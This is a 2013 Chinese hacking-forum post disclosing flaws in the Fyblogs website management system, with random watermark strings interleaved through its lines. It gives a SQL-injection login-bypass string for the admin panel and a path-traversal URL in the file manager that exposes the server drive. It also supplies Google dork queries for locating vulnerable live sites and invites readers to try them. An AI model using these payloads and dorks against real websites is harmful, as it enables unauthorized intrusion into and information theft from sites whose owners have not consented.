找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2064|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-7 13:07:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: 未授权访问/权限绕过- I; b" q2 o% g0 S  i( e7 B
, g4 G* a" I# t. D3 p1 {
简要描述:1 Y( I! C0 E4 s  c5 V

# t+ ?' v  w$ z3 J) p% eFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!1 j$ J& Z3 }' `7 M

* f2 ^# s2 v* l/ ~2 p9 N详细说明:
' X+ m/ ~6 U( ]! x4 q2 P3 d/ g% N" L4 |0 d! X
后台万能密码 'or'='or'
) R) p9 ~( f- F; i3 K后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 v/ u0 `  Q/ P# X  nadmin/uploadfile.asp?currentFolder=/upfiles/../" R3 `* f$ O- `/ s- j* `' |

/ k$ J5 u7 g6 d. _0 K4 B漏洞证明:
3 s9 H4 r% g9 j3 G
) X0 |& M2 t" @- X! I9 t- B7 `8 z谷歌:inurl:type.asp?id=1 新闻中心
1 u. D6 C0 I, w或者 :inurl:download_ok.asp?
- ?, K5 U5 ?' F. f' ]- _; z# y! t) V5 ?; `3 I
可以测试" w9 ^% Y' A5 F# ~! a2 E+ h; Z

" f: l( w4 H- P2 q4 q  C
5 p2 P3 y- @" u6 I' i( Z; o# K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表